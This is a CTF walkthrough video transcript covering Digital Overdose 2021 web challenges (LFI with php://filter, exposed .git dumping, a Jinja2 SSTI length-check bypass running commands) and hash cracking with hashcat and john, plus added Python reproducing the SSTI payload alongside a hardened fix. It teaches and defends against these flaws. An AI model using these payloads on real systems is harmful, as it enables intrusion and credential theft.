Web Challenge Walkthroughs - Digital Overdose CTF 2021

Captions
In this video we're going to take a look at some of the web challenges from the Digital Overdose 2021 CTF, and we'll start with the easiest challenge, which is called "Not Required". The description says: "Hello, I'm teamsloverboy33. I made a PHP website, can you do a quick security check on it?" So we've got the site already to connect to. Let's open it up, and when we go through to the site we see "hello"; we've basically got the same message there. We can see here it's actually loading the file index.html. We could have a look at the source here just to see if there's anything hidden, any comments or anything, but it doesn't look like it. So this is loading index.html. The first thing I would try to do here is see if we can access... well, let's try just "flag" first of all, and we get this message saying "require(flag): failed to open stream: No such file or directory". So this is the classic local file inclusion vulnerability: they're including a file and they're allowing the user to supply the name of that file. So if we were to go and, say, move back a directory and try and open flag, you can see it's actually trying; it's going to keep going back a directory each time we do that. In fact, what we can do here as well, let me just try /etc/passwd. All right, yeah, so even without moving through the directories we're able to just include /etc/passwd there. It doesn't give us any hint as to what the flag might be, so we could go around and keep trying to look for the flag in flag-related file names. What I did here was to have a look at some filter tricks. Let me look for "LFI filter cheat sheet". I think HackTricks is down at the moment; let me open HighOn.Coffee. Yeah, it's down at the moment, so we'll not be able to use that during this video, but if you're going to have a look at the HighOn.Coffee cheat sheet here, we'll see that there's some different wrappers that we can use to actually try to load PHP code, and in this case we're likely to want to see what's inside this index.php file. So let's see what we can do here. We have php://input, we have this php://filter. Let me try and include this, so I'm going to take a copy of that and we'll say the file is equal to this. It's going to try to convert it into base64, and then we'll be able to base64 decode the index.php, hopefully to get the original source code. So yeah, we've got a base64 encoded value, which looks good. Let's go ahead and do echo ... | base64 -d, and we get our source code here, and you can see that there's a note left in the PHP file saying "delete bin secrets.txt". So now we've got the location of a file called secret.txt; we can go ahead and just include this using our LFI vulnerability. We do that and we get back our flag.

The next challenge is called "git commit -m whatever", and we don't have a description, we've just got this site to connect to. So let's open it up and take a look. We open that up and we'll see a message saying "if only you could see the source code", with what looks like some kind of base64 encoded string. So I'm going to take a copy of that. Let's view the source just to see if there's any comments or anything in there, which there isn't, and let's go and try and base64 decode this. So we can echo it again, get rid of that space, and base64 -d, and we don't get anything recognisable here, so we'll move on. We know that the challenge, well, it's related to a git message, so let's try and just see if we can load .git. Oh, and we get "Forbidden: you don't have permission to access this resource". So we could go and make sure that's not just a generic message we're getting: if we try and put in a typo here, you'll see we get "Not Found". So the git repo is found, we just don't have permission to access it. We might want to just try it out anyway and see if we can clone the repo, which we can't: it's not found. We can go and have a look to see if we can access the config here. Let's do config, which we can; we can get the config. So if we can go through, we could brute force this, basically, with gobuster or your directory busting tool of choice, ffuf or something like that. Let's see if we can have a look at... so let's do .git/logs/refs/heads/master, and you can see here we have this commit: "initial commit", commit "a security suicide", and we can see that it was committed by a user called Elliot. So what we're going to do here is go and have a look at a tool called git-dumper, which we should be able to use to dump the repo, and I guess this is going to work a little bit, pretty much the same as if we were to brute force the directories, but it knows what to look for in terms of the directory structure and typical file names or commit names, stuff like that. So let's install this; we can just do pip install, so I'm gonna do pip install git-dumper, and then to run it we just need to run git-dumper, our options, and then the URL and directory. So let's create a new directory and we'll do git-dumper, grab the URL, close down, paste that in; we'll do .git (I'm not sure if it's required, but provide that) and then the new directory as well. We run that and you can see, yes, it's fetching all these objects; we have our whole git directory there. Let's go and take a look at it, and let me jump into the .git first of all so we can actually see the full structure here. We could have a look with tree and see what's in each of these directories; we could try and grep for things. So we might want to grep, let's do recursive, not case sensitive, and we could try and grep for "flag" in here: nothing. Why don't we try and grep for a curly brace? Okay, so it's found in these binary files, but that's not too good. Let's do "Digital Overdose", and we're not getting anything. So if we go back we could go and start having a look through some of these, but if we go back we'll actually see that the git repo already has some stuff in it here. So, for example, we have our index.php file, so why don't we take a look at index.php and try and find out what's inside it, because obviously you're not able to view the source code through the website itself. If we do that we'll see that we've got a decrypt function. Let me zoom in a bit; too much. We have an encrypt function and a decrypt function, create encryption key, and we can basically see that the index.php file, so whenever you're opening up this website, what it's actually doing is it's using this private key, it's grabbing the file contents of flag, so it's loading the flag, and then it's going to encrypt the flag with this private key and then it's going to echo that out. So what we actually have here is our flag, which has been encrypted. So why don't we go and just modify this code? Let's say that our flag, we're not loading it from the file, it's this right here, the value that we've just grabbed, and we've already got a private key, so why don't we just try and change this to decrypt, and we're decrypting the flag with the private key. That looks pretty good to me, but I'm missing a semicolon, and then it's just going to echo this out, which again looks good. Let's try and run php index.php. We get a message saying "call to undefined function", so let's go and Google that and see what it's about: not enabled by default, please refer to this for installation, or we can do this: sudo apt-get install mbstring. What I'm gonna do, I'm probably using a different PHP version, so let me do php --version. We're using 7.4, so we'll do sudo apt-get install php7.4- and then let's paste in that mbstring. It's going to run through that and install it, and let's try and run php index.php again, and this time we get back our flag, which decrypted the flag using that encrypted flag value and the private key and returned our result.

The next challenge is called "Mad Lib", and the description says: "I just created the first draft of my first Flask project, a mad lib generator that fills the given words into a mad lib template. Try it out and let me know what you think. The character length limit should make this app pretty secure." So we've got this server and port number to connect to. We're going to open that up and we'll see that we've got this form asking us to pick our words. Let's just try and put in some values here and see how it responds to different data types; we might want to try and insert a script as well. If we submit that, we'll get a message saying that it must not be longer than 21 characters. Let's take out our script and just put something else in here. We submit that and then this all comes back with our values inserted into this string. We could have a look at the source here, the HTML, but there's really not too much for us to look at, and we've been given the source code for the server side, so let's actually just open that up and take a look. I'm going to copy this over to VSCodium and let's just step through the source code a bit before we look into the vulnerability. So we can see here that it's importing from flask: we've got Flask, render_template_string, request and send_from_directory. If the website is loaded on the home page here, it's going to just call send_from_directory and send us the index.html rendered as HTML, but if we make a POST request to /madlib, then it's going to check to make sure the length of request.json is five, so it's going to make sure that we've inserted five JSON objects here. It's calling request.json.get on each one of those, which we just saw it do. It's going to then make sure that the length of each one of these values that we've entered is less than 21 characters, 21 characters or less, and if it is, it's going to basically take each of the values that we've put in and it's going to put them into these curly braces here in the text, and then it's going to call render_template_string with the mad lib. If we try and insert more than five words, you can see it's going to come back and say "the madlib only takes five words". So let's actually just jump over to Burp Suite. We'll see this POST request that we made to /madlib; I'm gonna send that to the Repeater, and if we then try and insert another one here, let's try and put in "hacked" and then we'll say that's equal to just something else, send that off, and then this time we get "the madlib only takes five words". So that's basically what it was talking about in that case.

So I'm going to open up, let's search here for SSTI, server-side template injection, and this is a really great article by James Kettle going through server-side template injection. Let's just jump through; I'm going to open up a cheat sheet as well. Normally I go to HackTricks, it's down at the moment, but this is a really good cheat sheet as well, just for going through and trying to find some commands to throw at the site. So I would really recommend going through this whole article, but let me just cover a little bit of it: "Template engines are widely used by web applications to present dynamic data via web pages and emails. Unsafely embedding user input in templates enables server-side template injection, a frequently critical vulnerability that's easy to mistake for cross-site scripting or miss entirely. Unlike cross-site scripting, template injection can be used to directly attack web servers' internals and often obtain RCE (remote code execution), turning every vulnerable application into a potential pivot point. Template injection can arise both through developer error and through intentional exposure of templates in an attempt to offer rich functionality, as is commonly done by wikis, blogs, etc. Intentional template injection is such a common use case that many template engines offer a sandboxed mode for this express purpose. This paper defines a methodology for detecting and exploiting template injection and shows it being applied to craft RCE zero-days for two widely deployed enterprise web applications. Generic exploits are demonstrated for five of the most popular template engines, including escapes from sandboxes whose entire purpose is to handle user-supplied templates in a safe way." So it has some links to the talk that was done at Black Hat USA as well as the white paper, and then we can basically go to this introduction. It goes through some different templating engines, how to identify what template engine is used. So, for example, we have an example here; let's go and throw this into our web application, and you'll see that it's come back with 49, so it's actually interpreted this. What we can do is, if we add some quotes here and submit that, the fact that we've got back seven sevens shows that this is Jinja2 as the template engine. If that would have come back with 49, I think it would have been maybe Twig or something like that, but you can basically go through some cheat sheets, throw in some different commands here and try and find out what it comes back with, and from there identify what the template engine is. In some cases maybe you'll get an error which will just kind of spit out the template engine that's used. You see that we've tried to enter in self; let's try and do self.__dict__ and submit that, and this time we'll be able to dump out this full dictionary of keys and values. So let's take a copy of this. Where does it end? It ends right here. We'll take a copy of that, we'll go and try and make this a bit easier to read, so we can format this in a better JSON format, and we can basically go and have a look through some of the functions we might be able to access here. So, for example, we have lipsum in there, which is going to be no use at all to us; we have this url_for; we can access the config and potentially set things in the config as well. Let's go back here and just change this to config.items() and submit that. Let me get these back as well, so we could go and add these to our JSON viewer if you want to go and have a look through some of that. But the problem we're going to run into trying to build this up: essentially, if we go back over to our cheat sheet here and look at some of the examples that we might be trying to run through, you see a lot of these commands that we'd be trying to enter are far too long. We have a maximum of 21 characters per command, so we're not going to be able to enter anything like this, and in fact even trying to access things like this, the __class__.__base__.__subclasses__() chain, is going to be too long for us.

So my team had some good ideas on how to approach this, and in the end found an unintended solution which I think seems to be easier than the intended solution. So let's run through some of the thinking. One of the first things which I thought was a really good idea was to use the request URL to try and extend the amount of space we have available here. So, for example, if we were to pass in a request here, and let's say this is "longer than 21 chars", so we see we're actually passing this in in the request, and if we now say that we want to print out the request.url, let's try and print that out, and we get this full URL here. But if we just wanted to access the string that was at the end of that, we can basically go and find out how long is this part of the string, or this part of the string, and access the substring of it. So we can say here now, let's go back and change this to set, so we can actually set this to, let's say, a equals request.url, and then in the next parameter we can use that variable which has just been set. So we can say that we want to access, say, a from 34 onwards, which is the size of the beginning of the URL, and if we submit that, this time we don't get anything because we need our two curly braces on each side. So again, this time we get "this is longer than 21 chars", so we're actually able to pass in. The problem is this is a string, so if we try to pass in something here, as in the payloads that we were seeing over here, if we're trying to pass in, for example, one of these strings here and then try to execute it, it'll still be a string inside this value. But we did have some things available to us here in the config, and, not in the config sorry, in the self.__dict__ we had some things available including, I can't see it now, but cycler; okay, we've got cycler and we've got joiner. Let me actually just go SSTI, I'm just going to go and open up another cheat sheet here, jump down here. You see here that if we were able to access a payload like this, cycler.__init__.__globals__.os.popen, then we'd be able to get some kind of command execution. So, for example, let's go back and try and set this to, let's try and use the cycler. So if we say here that we want to use a is equal to cycler, and then we could say in our second value here we want to set b is equal to a.__init__, let's go here, and the idea I think is to basically chain this together. You can see here we've got our cycler __init__; the idea would be to chain this together, so say if we continue with this process and try and say, let me actually just take a copy of that and then do the same, our next bit was __globals__ and then os. So we go here and say __globals__, but we're going to run into the problem that this is greater than 21 characters. So I was trying to set this, let's say instead that that's just b is equal to globals, and then in the next value we can say that, say, c is equal to a.b and then maybe os, and then you would like to hope that towards the end we would be able to just say now that we want to access c.popen and then say ls. Let's try and run that: encountered an error. .read(), now it's greater than 21 characters. So we could try and add our popen here maybe and then just say c.ls, okay, now this is greater than 21 characters. So this was kind of the process of going through and trying to use variables to solve this. To be honest, at this point I hadn't really contributed too much towards solving the challenge; this is mostly my teammates working on it. But what I was thinking here is, could we bypass this length check in any way? So this is checking: is the length of each one of these values greater than 21? And if we're passing in a string, obviously it's going to check if there are more than 21 characters, but what happens if we pass a list here instead? So if I was to go back here and say, let's go and take a copy, for example, of this right here, which is something like what we want to execute, so if we send that off, this is obviously greater than 21 characters, but if we were to send this off and make sure this was inside some square brackets, it's now a list. So what's the length of this now? The length would be one, because there's only one item in the list. Now we're still getting an error there, but let's take out some of these other commands which might be causing some issues, and we submit that again, and this time you'll see that in the place of our verb we've actually got back our id. So we can go back and say let's run ls, and that comes back with the list of the files in the directory. We can go ahead and say cat flag.txt and then we get back our flag. So this was the unintended solution; we didn't actually make use of the five different placeholders we have here. The intended solution, I believe, was to actually use the config, and I think you can actually see, if we go back to our JSON viewer here, you can actually see that somebody else has assigned some variables. So you can see that they've assigned os to bd, they've assigned popen to be e, and they're using the URLs and stuff as well; they've got __init__, they've got __globals__. So the idea really is to build these up in the config so they persist between each request, and then you can call those from there. But it looks like the solution that we used there was quite a bit easier anyway, but I look forward to seeing what kind of creative solutions some other people have come up with for this as well.

Okay, I know I said we were just going to focus on the web challenges in this week's video, but these hash cracking challenges are nice and easy, so let's just run through a few of them. So we've got some hashes to crack. Our first one, let's run hashid to get an idea what type of hash it is: most likely MD2 or MD5 according to this, but we can take a copy of this, we go to a couple of different sites. Let's actually, we'll try out CrackStation, generally a good one, but I find that it's probably going to ask us to do a captcha. Oh, it didn't, okay, awesome. We run that, we get our first flag back, which is "phantom lover". Let's go and have a look at the next one. Again, hopefully we can just paste this in here, leave that to crack. We didn't even run hashid that time, but let's do it, and this time SHA1; you can actually see it comes up here, SHA1. This was fish and chips, "fishchips". Let's go back to the third one. We can run hashid, and this time SHA-512 by the looks of it. Again, let's just go and throw it in CrackStation, crack hashes, this time "mama dobbins". Let's go back to our fourth hash, hashid, this time most likely Snefru-256 or SHA-256, which sounds more likely to me, but let's go and throw it in CrackStation and see if it knows what to do with it. Okay, now it wants me to start doing some image labelling. Crack hashes, this time we get not found. Okay, so what I'm gonna do this time is let's create a file called hash, let's paste that in there, and I'm gonna run this with john, so we can use John the Ripper. We'll do john --wordlist; what I really don't like here is if I put in an equals sign it's not going to allow me to do auto-complete, so I have to put in a space here. We'll use /usr/share/wordlists, hopefully it'll be in rockyou; we'll pass in hash as well. Let me go and get rid of the space, and it's going to try and identify what type of hash it is, and it's come back very quickly to say that the hash was "happy family". So it detected gost, I guess that's what it was using; yeah, it used gost, but you have the option of specifying some of these others if you want to try those instead. And now we've got the hash, but we could run john --show hash as well to get access to that again. So that one was "happy family". Let's go and have a look at the fifth one. Okay, so this time we'll check hashid again; we've got some dollar signs in there which we need to escape, so let me go and do that, and this time we've got Blowfish, okay. What I'm going to do now is move over to hashcat, because hashcat's a lot quicker, particularly if I do it outside of the VM. I'm going to go and have a look here, hashcat example hashes, and this is just a good place to go and find out what kind of mode we need to use here. So in this case it was Blowfish, which we can see here is mode 3200. So bearing that in mind, let me jump over to my Windows system, outside my VM, and let's go and try this in hashcat. So I'm over on the Windows system here, I've got the command prompt open and I've got the hashes in a file called hashes\hashes.txt. So you can see here that's the hash, but we could just pass this in as a string as well, and now we're going to run hashcat.exe and we'll pass in that mode, which is 3200 for Blowfish, and then we'll pass in the hashes. I should just type that in: hashes\hashes.txt. We can also pass in the wordlist here as well, so I've got a few wordlists here: we've got CrackStation, we've got Have I Been Pwned, we've got rockyou, which we'll try first of all. Okay, let me take out that -w, that's the wrong thing to put in, and we'll run through that. We can enter any key for status here, so that'll give you an idea how long it's got to complete. You can see here, started one second, it's got six hours to complete, seven hours to complete, and we can see that's finished. It started at 53 minutes past, it took less than two minutes to complete, and we got back our password, which was "cowabunga". So back over to our challenges, let's go and have a look at the sixth hash, and this time we have this very random salt thing here. Let's take a copy of this again, let's use hashid, let's set this to backslash so we can identify it: md5crypt, okay. Let's go to our hashcat here, let's search for md5crypt, and we'll see that it's mode 500. So I'm going to jump back over to the Windows system and let's try it out. Okay, so we're back over on the Windows system, we can have a look at the hashes again; this has been updated with the new hash, and we want to run hashcat.exe, and this time the mode is 500 for md5crypt, and we're passing in the hashes and then we'll use the wordlist again, rockyou. Once through that, we can hit s for status; that one cracked very quickly, it took five seconds, and it found that the password was "scotty banks". Okay, and back over to the VM for the final challenge, which is hash seven, and this is quite a long one. Let's have a look at hashid again, get rid of all these dollar signs, and there's only one possibility: it's a sha512crypt. So let's go and have a look at SHA-512; let's see if we can just put "crypt", yep, it's 1800. All right, let's jump over to the Windows system and try it out, and once again we can check the hashes, see that we've got our updated hash in here, and we want to run hashcat.exe. The mode is 1800, the hashes are in hashes\hashes.txt and the wordlist again will just be wordlists\rockyou. Again we can hit status, but before we can even hit status it's cracked. It started at 23, finished 26, so it took three seconds and identified that the hash was "i get money". And that wraps it up for the hash cracking challenges.

So I did solve a couple of other challenges in the CTF; I'm gonna go and take a look at some more now as well, but I want to try and limit these videos in terms of the amount of categories I'm running through in the walkthroughs, just because it's quite time consuming going through and editing out all the audio issues and zooming in on text and things like that, and I want to try and focus more on just kind of working on some of the challenges as well. But shout out to the team anyway, and I hope you've enjoyed this video. If you have any questions or comments, any interesting solutions to any of the challenges that I demonstrated here or any of the challenges that I missed, then do let me know.
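The Mad Lib length-check bypass described in the captions, as an added example that is not the challenge's own code. The real app used Flask's request.json and render_template_string; this model stands in a constructed JSON body for the request and Python str.format for the placeholder substitution, so it runs without Flask or Jinja2 installed. The SSTI payload, the five field names and the template sentence are assumptions for illustration. The point it shows is why the check passes: len() is applied to the decoded JSON value, and a JSON array containing one long string has length 1, while str() of that list still carries the {{ ... }} into the template source. The hardened variant type-checks every word and hands the words to the engine as context data instead of splicing them into the template.

```python
import json

MAX_LEN = 21
FIELDS = ("adjective", "noun", "verb", "adverb", "plural_noun")
# Assumed template; the five placeholders are filled with the submitted words.
TEMPLATE = "The {adjective} {noun} decided to {verb} {adverb} with the {plural_noun}."

# Constructed Jinja2 SSTI payload (the cycler chain from the cheat sheets).
# 53 characters as a string, so it can never pass the length check directly.
PAYLOAD = "{{cycler.__init__.__globals__.os.popen('id').read()}}"

# Constructed request bodies, as the JSON a client would POST to /madlib.
BODY_BENIGN = json.dumps({"adjective": "quick", "noun": "fox", "verb": "jump",
                          "adverb": "quietly", "plural_noun": "dogs"})
BODY_ATTACK = json.dumps({"adjective": "quick", "noun": "fox", "verb": [PAYLOAD],
                          "adverb": "quietly", "plural_noun": "dogs"})


def build_madlib_vulnerable(raw_body):
    """Mirror of the challenge's check as described in the walkthrough:
    len() is applied to whatever JSON value arrived, not to a string.
    Returns the template source that render_template_string would receive."""
    body = json.loads(raw_body)                  # request.json in the Flask app
    if len(body) != 5:
        return "The madlib only takes 5 words"
    words = {}
    for field in FIELDS:
        value = body.get(field)
        if value is None or len(value) > MAX_LEN:   # len([PAYLOAD]) == 1 passes
            return "Words must not be longer than 21 characters"
        words[field] = value
    # str(list) keeps the {{ ... }} intact, so Jinja2 would evaluate it.
    return TEMPLATE.format(**words)


def build_madlib_hardened(raw_body):
    """Type-check every word and keep user input out of the template source.
    Returns the fixed template plus a context dict for the engine; in Flask
    this would be render_template_string(JINJA_TEMPLATE, **context), where
    the template uses {{ adjective }} etc., so a '{{' inside a word is data
    that gets printed, never template code that gets parsed."""
    body = json.loads(raw_body)
    if not isinstance(body, dict) or len(body) != 5:
        raise ValueError("The madlib only takes 5 words")
    context = {}
    for field in FIELDS:
        value = body.get(field)
        if not isinstance(value, str):           # rejects lists, numbers, null
            raise ValueError(f"{field} must be a string")
        if len(value) > MAX_LEN:
            raise ValueError(f"{field} must not be longer than {MAX_LEN} characters")
        context[field] = value
    return TEMPLATE, context


def hardened_rejects(raw_body):
    """True if the hardened builder refuses the body."""
    try:
        build_madlib_hardened(raw_body)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(build_madlib_vulnerable(BODY_BENIGN))
    print(build_madlib_vulnerable(BODY_ATTACK))   # payload survives the check
    print(hardened_rejects(BODY_ATTACK))          # True
```

Note that the intended fix is the second half of the hardened builder: the length and type checks stop this particular trick, but any app that concatenates user input into the string passed to render_template_string is one missed check away from SSTI, whereas passing the words as context variables removes the class of bug.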
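The hash-cracking routine the captions walk through with hashid, CrackStation, john and hashcat, as an added example that is not part of the video: identify an unsalted hex digest by its length, then run a small dictionary attack with hashlib. It also shows the ambiguity john resolves with its "detected hash type" warning: a 64-hex digest could be SHA-256, GOST or SHA3-256, so every candidate for that length is tried. The wordlist and the sample hashes are constructed (the known digests of the word "password"); the crypt-style prefixes are recognised only so the script can tell you to use hashcat with the modes from the video (500, 3200, 1800) instead of trying to crack salted, iterated hashes itself.

```python
import hashlib

# Unsalted hex digest length -> hashlib algorithms worth trying, in the order
# a cracker should try them (hashlib has no GOST, so that candidate is omitted).
HEX_LEN_TO_ALGOS = {
    32: ("md5",),
    40: ("sha1",),
    64: ("sha256", "sha3_256"),
    128: ("sha512", "sha3_512"),
}

# Crypt-style prefixes met in the walkthrough; salted and iterated, so hand
# them to hashcat (mode given) or john rather than to this script.
CRYPT_PREFIXES = {
    "$1$": "md5crypt (hashcat -m 500)",
    "$2a$": "bcrypt/Blowfish (hashcat -m 3200)",
    "$2b$": "bcrypt/Blowfish (hashcat -m 3200)",
    "$2y$": "bcrypt/Blowfish (hashcat -m 3200)",
    "$6$": "sha512crypt (hashcat -m 1800)",
}

# Constructed wordlist standing in for rockyou.txt.
WORDLIST = ["123456", "letmein", "password", "cowabunga", "phantomlover"]

# Constructed sample hashes: the well-known digests of "password", plus one
# digest of a word that is deliberately absent from WORDLIST.
SAMPLE_HASHES = {
    "md5": "5f4dcc3b5aa765d61d8327deb882cf99",
    "sha1": "5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8",
    "sha256": "5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8",
    "sha512_unknown": hashlib.sha512(b"not-in-the-wordlist").hexdigest(),
}


def identify(hash_str):
    """Return ("crypt", description), ("hex", algos) or ("unknown", ())."""
    h = hash_str.strip()
    for prefix, description in CRYPT_PREFIXES.items():
        if h.startswith(prefix):
            return ("crypt", description)
    h = h.lower()
    if len(h) in HEX_LEN_TO_ALGOS and all(c in "0123456789abcdef" for c in h):
        return ("hex", HEX_LEN_TO_ALGOS[len(h)])
    return ("unknown", ())


def candidates(word):
    """A few cheap rule-style mutations on top of the plain word."""
    yield word
    yield word.capitalize()
    yield word + "1"
    yield word + "123"


def crack(hash_str, wordlist):
    """Dictionary attack on an unsalted hex digest.
    Returns (algorithm, plaintext) or None (not found, salted, or unknown)."""
    kind, algos = identify(hash_str)
    if kind != "hex":
        return None
    target = hash_str.strip().lower()
    for word in wordlist:
        for cand in candidates(word):
            data = cand.encode()
            for algo in algos:
                if hashlib.new(algo, data).hexdigest() == target:
                    return (algo, cand)
    return None


if __name__ == "__main__":
    for label, h in SAMPLE_HASHES.items():
        print(label, identify(h), crack(h, WORDLIST))
    print(identify("$6$randsalt$notarealhash"))
```

The script is there to make the identification step concrete, not to replace the tools: hashid and john guess from length and prefix in exactly this way, which is why john picked gost for the 64-hex hash in the video and why the same digest cracks as SHA-256 here.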
Info
Channel: CryptoCat
Views: 1,456
Keywords: digital overdose, capture the flag, CTF, web exploitation, bug bounty, LFI, SSTI, git dumper, git forensics, web hacking, jinja2, flask, hash cracking, hashcat, john the ripper, crackstation, writeup, tutorial, infosec, cybersecurity, wargames, DigitalOverdose, redteam, appsec, vulnerability analysis, burp suite, websec, portswigger, forensics, exploit, security, kali, parrot, hashid, pentesting, OSWE, walkthrough, madlib, xss, pwn, reversing, RFI, john hammond, liveoverflow, DOCTF, solve, hackathon, challenge, ctftime
Id: ssiWl8kzZwk
Length: 30min 8sec (1808 seconds)
Published: Mon Oct 11 2021